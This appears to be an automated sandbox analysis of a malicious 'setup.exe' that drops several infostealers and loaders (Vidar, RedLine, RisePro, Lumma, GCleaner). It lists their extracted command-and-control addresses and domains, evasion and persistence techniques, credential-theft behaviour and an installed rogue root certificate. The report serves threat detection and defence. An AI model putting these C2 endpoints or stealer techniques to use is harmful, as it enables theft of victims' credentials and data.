gcleaner | 298882eef447afb08c134245d29d689feb30431a4c8595da619f2038f6d8b615

max time kernel
65s
max time network
156s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15-04-2024 19:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup.exe
Size

700.0MB
MD5

6d23d8dee5299700881a3e484eef8a9c
SHA1

43b0c7e5bea63447ef78225d76fb47c6b29a4381
SHA256

9383433f5dd673392f5dc01b0a8e84e063bf182cdb46fa49000a0b890f448240
SHA512

c98754f41c3f094dc4d39f486c9ac0b6f91977258ba1a347c0914c00e47bf995398a5c4572a8ea5d529a28c12a71b6bfb09869bd9187416e31978440b33a4e87
SSDEEP

49152:GnjzX9RG5mnTDunfqNMP9Pyz6DMPCMTbzdZEmqyXVSY+wfdH1rFuzi56M/cH1oYI:OD9cSfX69PvQP1vFqyXHvsnM/PbQi

Malware Config

Extracted

Family

vidar

https://steamcommunity.com/profiles/76561199673019888

https://t.me/irfail

https://t.me/de17fs

https://steamcommunity.com/profiles/76561199667616374

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0

Extracted

Family

risepro

193.233.132.253:50500

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

5.42.65.50:33080

Extracted

Family

gcleaner

185.172.128.90

5.42.65.64

Attributes

url_path
/advdlc.php

Extracted

Family

lumma

https://greetclassifytalk.shop/api

https://entitlementappwo.shop/api

https://economicscreateojsu.shop/api

https://pushjellysingeywus.shop/api

https://absentconvicsjawun.shop/api

https://suitcaseacanehalk.shop/api

https://bordersoarmanusjuw.shop/api

https://mealplayerpreceodsju.shop/api

https://wifeplasterbakewis.shop/api

Signatures

Detect Vidar Stealer 6 IoCs

stealer

Processes:

resource	yara_rule
behavioral3/memory/1628-302-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral3/memory/1628-333-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral3/memory/832-336-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral3/memory/832-305-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral3/memory/1628-350-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral3/memory/832-353-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7

Detect ZGRat V1 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Documents\SimpleAdobe\Wv3mdsLaSz1MXwzKqP4CIyz4.exe	family_zgrat_v1
behavioral3/memory/4680-295-0x0000000000B10000-0x00000000010FC000-memory.dmp	family_zgrat_v1

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

setup.exeBhqyLQYwokC1WRzvX7kf3h1J.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	BhqyLQYwokC1WRzvX7kf3h1J.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/888-304-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup.exeBhqyLQYwokC1WRzvX7kf3h1J.exeuDf5aAoFw9G2zjOHLeKGRIDF.exeLLHulNcUZD0RHSrXHw028qEL.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BhqyLQYwokC1WRzvX7kf3h1J.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	uDf5aAoFw9G2zjOHLeKGRIDF.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	LLHulNcUZD0RHSrXHw028qEL.exe

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

1304 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

pid	process
1304	netsh.exe

Checks BIOS information in registry 2 TTPs 9 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LLHulNcUZD0RHSrXHw028qEL.exeInstall.exeBhqyLQYwokC1WRzvX7kf3h1J.exeuDf5aAoFw9G2zjOHLeKGRIDF.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	LLHulNcUZD0RHSrXHw028qEL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BhqyLQYwokC1WRzvX7kf3h1J.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	uDf5aAoFw9G2zjOHLeKGRIDF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	uDf5aAoFw9G2zjOHLeKGRIDF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	LLHulNcUZD0RHSrXHw028qEL.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BhqyLQYwokC1WRzvX7kf3h1J.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

setup.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation setup.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation	setup.exe

Executes dropped EXE 19 IoCs

Processes:

uDf5aAoFw9G2zjOHLeKGRIDF.exeWv3mdsLaSz1MXwzKqP4CIyz4.exeLLHulNcUZD0RHSrXHw028qEL.exenzeUPYfksH2Je_cvKrZSZ8yt.exetFclRPvT6ogIJ0EjcHY3SLlV.exeZGs175WWCG9TzUwjejtUIUyE.exe8jzwXwHBadrpxKuTwM0wwx6Q.exeBhqyLQYwokC1WRzvX7kf3h1J.exeF4PsO_85eZwIxbaB0mc_D5Tb.exeCOFvVQmEFf9dLjropW5k7lbG.exeSRcOOb9EdAEkLEwXcm6hKuw4.exeOpZbT4g9pLRxOtK2TUsJia5y.exeOm_xfa1yuts1xcKD3lpn5M6Q.exeyktP61LlzfNSWIswKblrqQU3.exet8D1ffG_kYtcHvSLuguXApft.exeis-5S4QA.tmpInstall.exethreekingsoftvideo.exethreekingsoftvideo.exe

pid	process
3188	uDf5aAoFw9G2zjOHLeKGRIDF.exe
4680	Wv3mdsLaSz1MXwzKqP4CIyz4.exe
4352	LLHulNcUZD0RHSrXHw028qEL.exe
204	nzeUPYfksH2Je_cvKrZSZ8yt.exe
4052	tFclRPvT6ogIJ0EjcHY3SLlV.exe
2768	ZGs175WWCG9TzUwjejtUIUyE.exe
784	8jzwXwHBadrpxKuTwM0wwx6Q.exe
1952	BhqyLQYwokC1WRzvX7kf3h1J.exe
4876	F4PsO_85eZwIxbaB0mc_D5Tb.exe
5052	COFvVQmEFf9dLjropW5k7lbG.exe
3576	SRcOOb9EdAEkLEwXcm6hKuw4.exe
2736	OpZbT4g9pLRxOtK2TUsJia5y.exe
4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe
3768	yktP61LlzfNSWIswKblrqQU3.exe
4600	t8D1ffG_kYtcHvSLuguXApft.exe
5072	is-5S4QA.tmp
4172	Install.exe
1700	threekingsoftvideo.exe
3636	threekingsoftvideo.exe

Loads dropped DLL 1 IoCs

Processes:

is-5S4QA.tmp

pid process

5072 is-5S4QA.tmp
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
5072	is-5S4QA.tmp

Themida packer 24 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral3/memory/4012-0-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-5-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-7-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-8-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-9-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-10-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-11-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-12-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-37-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-127-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-128-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-201-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/4012-226-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
C:\Users\Admin\Documents\SimpleAdobe\BhqyLQYwokC1WRzvX7kf3h1J.exe	themida
behavioral3/memory/1952-337-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/1952-331-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/1952-306-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/1952-300-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/1952-298-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/1952-355-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/1952-348-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/1952-299-0x0000000000340000-0x000000000090B000-memory.dmp	themida
behavioral3/memory/4012-417-0x00007FF603140000-0x00007FF6039A4000-memory.dmp	themida
behavioral3/memory/1952-451-0x0000000000340000-0x000000000090B000-memory.dmp	themida

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Documents\SimpleAdobe\nzeUPYfksH2Je_cvKrZSZ8yt.exe	vmprotect
behavioral3/memory/204-358-0x00000000000A0000-0x000000000098E000-memory.dmp	vmprotect
behavioral3/memory/204-442-0x00000000000A0000-0x000000000098E000-memory.dmp	vmprotect

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

LLHulNcUZD0RHSrXHw028qEL.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	LLHulNcUZD0RHSrXHw028qEL.exe
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	LLHulNcUZD0RHSrXHw028qEL.exe
Key opened	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	LLHulNcUZD0RHSrXHw028qEL.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup.exeBhqyLQYwokC1WRzvX7kf3h1J.exeuDf5aAoFw9G2zjOHLeKGRIDF.exeLLHulNcUZD0RHSrXHw028qEL.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	BhqyLQYwokC1WRzvX7kf3h1J.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	uDf5aAoFw9G2zjOHLeKGRIDF.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	LLHulNcUZD0RHSrXHw028qEL.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs

Web Service
T1102

Processes:

flow ioc

18 bitbucket.org
26 bitbucket.org
39 bitbucket.org
93 bitbucket.org
150 iplogger.org
151 iplogger.org
226 iplogger.org
230 iplogger.org
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

183 ipinfo.io
283 ipinfo.io
4 api.myip.com
5 ipinfo.io
158 api.myip.com
161 ipinfo.io
162 ipinfo.io
3 api.myip.com
6 ipinfo.io
284 ipinfo.io

flow	ioc
18	bitbucket.org
26	bitbucket.org
39	bitbucket.org
93	bitbucket.org
150	iplogger.org
151	iplogger.org
226	iplogger.org
230	iplogger.org

flow	ioc
183	ipinfo.io
283	ipinfo.io
4	api.myip.com
5	ipinfo.io
158	api.myip.com
161	ipinfo.io
162	ipinfo.io
3	api.myip.com
6	ipinfo.io
284	ipinfo.io

Drops file in System32 directory 8 IoCs

Processes:

setup.exeBhqyLQYwokC1WRzvX7kf3h1J.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	BhqyLQYwokC1WRzvX7kf3h1J.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	BhqyLQYwokC1WRzvX7kf3h1J.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	BhqyLQYwokC1WRzvX7kf3h1J.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	BhqyLQYwokC1WRzvX7kf3h1J.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exeBhqyLQYwokC1WRzvX7kf3h1J.exeuDf5aAoFw9G2zjOHLeKGRIDF.exeLLHulNcUZD0RHSrXHw028qEL.exe

pid process

4012 setup.exe
1952 BhqyLQYwokC1WRzvX7kf3h1J.exe
3188 uDf5aAoFw9G2zjOHLeKGRIDF.exe
4352 LLHulNcUZD0RHSrXHw028qEL.exe

pid	process
4012	setup.exe
1952	BhqyLQYwokC1WRzvX7kf3h1J.exe
3188	uDf5aAoFw9G2zjOHLeKGRIDF.exe
4352	LLHulNcUZD0RHSrXHw028qEL.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

8jzwXwHBadrpxKuTwM0wwx6Q.exetFclRPvT6ogIJ0EjcHY3SLlV.exeOm_xfa1yuts1xcKD3lpn5M6Q.exe

description	pid	process	target process
PID 784 set thread context of 1628	784	8jzwXwHBadrpxKuTwM0wwx6Q.exe	RegAsm.exe
PID 4052 set thread context of 888	4052	tFclRPvT6ogIJ0EjcHY3SLlV.exe	RegAsm.exe
PID 4908 set thread context of 832	4908	Om_xfa1yuts1xcKD3lpn5M6Q.exe	RegAsm.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4604 sc.exe
4184 sc.exe
4732 sc.exe
648 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4604	sc.exe
4184	sc.exe
4732	sc.exe
648	sc.exe

Program crash 12 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1996	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
4380	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
2372	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
2064	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
4776	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
1640	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
360	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
4288	3576	WerFault.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
2456	832	WerFault.exe	RegAsm.exe
6128	4680	WerFault.exe	Wv3mdsLaSz1MXwzKqP4CIyz4.exe
6012	1628	WerFault.exe	RegAsm.exe
6032	3188	WerFault.exe	uDf5aAoFw9G2zjOHLeKGRIDF.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

LLHulNcUZD0RHSrXHw028qEL.exeCOFvVQmEFf9dLjropW5k7lbG.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	LLHulNcUZD0RHSrXHw028qEL.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	COFvVQmEFf9dLjropW5k7lbG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	COFvVQmEFf9dLjropW5k7lbG.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	LLHulNcUZD0RHSrXHw028qEL.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1868 schtasks.exe
4416 schtasks.exe
1976 schtasks.exe
4532 schtasks.exe
784 schtasks.exe
4372 schtasks.exe
5884 schtasks.exe
5680 schtasks.exe

pid	process
1868	schtasks.exe
4416	schtasks.exe
1976	schtasks.exe
4532	schtasks.exe
784	schtasks.exe
4372	schtasks.exe
5884	schtasks.exe
5680	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3388 taskkill.exe

pid	process
3388	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

RegAsm.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

BhqyLQYwokC1WRzvX7kf3h1J.exenzeUPYfksH2Je_cvKrZSZ8yt.exeyktP61LlzfNSWIswKblrqQU3.exeuDf5aAoFw9G2zjOHLeKGRIDF.exeLLHulNcUZD0RHSrXHw028qEL.exeCOFvVQmEFf9dLjropW5k7lbG.exepowershell.exe

pid	process
1952	BhqyLQYwokC1WRzvX7kf3h1J.exe
1952	BhqyLQYwokC1WRzvX7kf3h1J.exe
204	nzeUPYfksH2Je_cvKrZSZ8yt.exe
204	nzeUPYfksH2Je_cvKrZSZ8yt.exe
3768	yktP61LlzfNSWIswKblrqQU3.exe
3768	yktP61LlzfNSWIswKblrqQU3.exe
3188	uDf5aAoFw9G2zjOHLeKGRIDF.exe
3188	uDf5aAoFw9G2zjOHLeKGRIDF.exe
4352	LLHulNcUZD0RHSrXHw028qEL.exe
4352	LLHulNcUZD0RHSrXHw028qEL.exe
5052	COFvVQmEFf9dLjropW5k7lbG.exe
5052	COFvVQmEFf9dLjropW5k7lbG.exe
928	powershell.exe
928	powershell.exe
928	powershell.exe
4352	LLHulNcUZD0RHSrXHw028qEL.exe
4352	LLHulNcUZD0RHSrXHw028qEL.exe
928	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 928 powershell.exe

description	pid	process
Token: SeDebugPrivilege	928	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exeOm_xfa1yuts1xcKD3lpn5M6Q.exe8jzwXwHBadrpxKuTwM0wwx6Q.exetFclRPvT6ogIJ0EjcHY3SLlV.exet8D1ffG_kYtcHvSLuguXApft.exe

description	pid	process	target process
PID 4012 wrote to memory of 3188	4012	setup.exe	uDf5aAoFw9G2zjOHLeKGRIDF.exe
PID 4012 wrote to memory of 3188	4012	setup.exe	uDf5aAoFw9G2zjOHLeKGRIDF.exe
PID 4012 wrote to memory of 3188	4012	setup.exe	uDf5aAoFw9G2zjOHLeKGRIDF.exe
PID 4012 wrote to memory of 4680	4012	setup.exe	Wv3mdsLaSz1MXwzKqP4CIyz4.exe
PID 4012 wrote to memory of 4680	4012	setup.exe	Wv3mdsLaSz1MXwzKqP4CIyz4.exe
PID 4012 wrote to memory of 4680	4012	setup.exe	Wv3mdsLaSz1MXwzKqP4CIyz4.exe
PID 4012 wrote to memory of 4352	4012	setup.exe	LLHulNcUZD0RHSrXHw028qEL.exe
PID 4012 wrote to memory of 4352	4012	setup.exe	LLHulNcUZD0RHSrXHw028qEL.exe
PID 4012 wrote to memory of 4352	4012	setup.exe	LLHulNcUZD0RHSrXHw028qEL.exe
PID 4012 wrote to memory of 204	4012	setup.exe	nzeUPYfksH2Je_cvKrZSZ8yt.exe
PID 4012 wrote to memory of 204	4012	setup.exe	nzeUPYfksH2Je_cvKrZSZ8yt.exe
PID 4012 wrote to memory of 204	4012	setup.exe	nzeUPYfksH2Je_cvKrZSZ8yt.exe
PID 4012 wrote to memory of 4052	4012	setup.exe	tFclRPvT6ogIJ0EjcHY3SLlV.exe
PID 4012 wrote to memory of 4052	4012	setup.exe	tFclRPvT6ogIJ0EjcHY3SLlV.exe
PID 4012 wrote to memory of 4052	4012	setup.exe	tFclRPvT6ogIJ0EjcHY3SLlV.exe
PID 4012 wrote to memory of 2768	4012	setup.exe	ZGs175WWCG9TzUwjejtUIUyE.exe
PID 4012 wrote to memory of 2768	4012	setup.exe	ZGs175WWCG9TzUwjejtUIUyE.exe
PID 4012 wrote to memory of 2768	4012	setup.exe	ZGs175WWCG9TzUwjejtUIUyE.exe
PID 4012 wrote to memory of 784	4012	setup.exe	8jzwXwHBadrpxKuTwM0wwx6Q.exe
PID 4012 wrote to memory of 784	4012	setup.exe	8jzwXwHBadrpxKuTwM0wwx6Q.exe
PID 4012 wrote to memory of 784	4012	setup.exe	8jzwXwHBadrpxKuTwM0wwx6Q.exe
PID 4012 wrote to memory of 1952	4012	setup.exe	BhqyLQYwokC1WRzvX7kf3h1J.exe
PID 4012 wrote to memory of 1952	4012	setup.exe	BhqyLQYwokC1WRzvX7kf3h1J.exe
PID 4012 wrote to memory of 1952	4012	setup.exe	BhqyLQYwokC1WRzvX7kf3h1J.exe
PID 4012 wrote to memory of 4876	4012	setup.exe	F4PsO_85eZwIxbaB0mc_D5Tb.exe
PID 4012 wrote to memory of 4876	4012	setup.exe	F4PsO_85eZwIxbaB0mc_D5Tb.exe
PID 4012 wrote to memory of 4876	4012	setup.exe	F4PsO_85eZwIxbaB0mc_D5Tb.exe
PID 4012 wrote to memory of 5052	4012	setup.exe	COFvVQmEFf9dLjropW5k7lbG.exe
PID 4012 wrote to memory of 5052	4012	setup.exe	COFvVQmEFf9dLjropW5k7lbG.exe
PID 4012 wrote to memory of 5052	4012	setup.exe	COFvVQmEFf9dLjropW5k7lbG.exe
PID 4012 wrote to memory of 3576	4012	setup.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
PID 4012 wrote to memory of 3576	4012	setup.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
PID 4012 wrote to memory of 3576	4012	setup.exe	SRcOOb9EdAEkLEwXcm6hKuw4.exe
PID 4012 wrote to memory of 2736	4012	setup.exe	OpZbT4g9pLRxOtK2TUsJia5y.exe
PID 4012 wrote to memory of 2736	4012	setup.exe	OpZbT4g9pLRxOtK2TUsJia5y.exe
PID 4012 wrote to memory of 2736	4012	setup.exe	OpZbT4g9pLRxOtK2TUsJia5y.exe
PID 4012 wrote to memory of 4908	4012	setup.exe	Om_xfa1yuts1xcKD3lpn5M6Q.exe
PID 4012 wrote to memory of 4908	4012	setup.exe	Om_xfa1yuts1xcKD3lpn5M6Q.exe
PID 4012 wrote to memory of 4908	4012	setup.exe	Om_xfa1yuts1xcKD3lpn5M6Q.exe
PID 4012 wrote to memory of 4600	4012	setup.exe	t8D1ffG_kYtcHvSLuguXApft.exe
PID 4012 wrote to memory of 4600	4012	setup.exe	t8D1ffG_kYtcHvSLuguXApft.exe
PID 4012 wrote to memory of 4600	4012	setup.exe	t8D1ffG_kYtcHvSLuguXApft.exe
PID 4012 wrote to memory of 3768	4012	setup.exe	yktP61LlzfNSWIswKblrqQU3.exe
